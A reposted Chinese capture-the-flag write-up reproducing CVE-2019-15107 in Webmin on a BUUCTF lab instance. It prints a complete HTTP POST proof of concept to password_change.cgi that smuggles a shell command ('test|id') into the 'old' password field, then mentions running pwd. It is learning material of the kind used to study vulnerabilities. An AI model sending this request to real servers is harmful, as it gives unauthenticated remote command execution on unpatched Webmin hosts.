脚本宝典收集整理的这篇文章主要介绍了【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
webmin 是一个用于管理类 Unix 系统的管理配置工具,具有 Web 页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
BUUCTF 的 Real 分类下,[Webmin]CVE-2019-15107
模块。
直接进入提示内容如下:
在 URl 地址栏前面增加 https://
即可:
使用 BurpSuITe 对该页面进行抓包,将数据包发送到 RePEater,然后使用下面的 POC:
POST /password_change.cgi HTTP/1.1
Host: node4.buuoj.cn:28720
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://node4.buuoj.cn:28720/session_login.cgi
Content-type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&PAM=&expired=2&old=test|id&new1=test2&new2=test2
注意:将 Host 和 Referer 中的地址更改为自己的实际地址。
在返回包中发现了内容:
使用 pwd
命令,查看当前所在的目录:
以上是脚本宝典为你收集整理的【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现全部内容,希望文章能够帮你解决【RCE | BUUCTF】CVE-2019-15107 Webmin远程代码执行漏洞复现所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。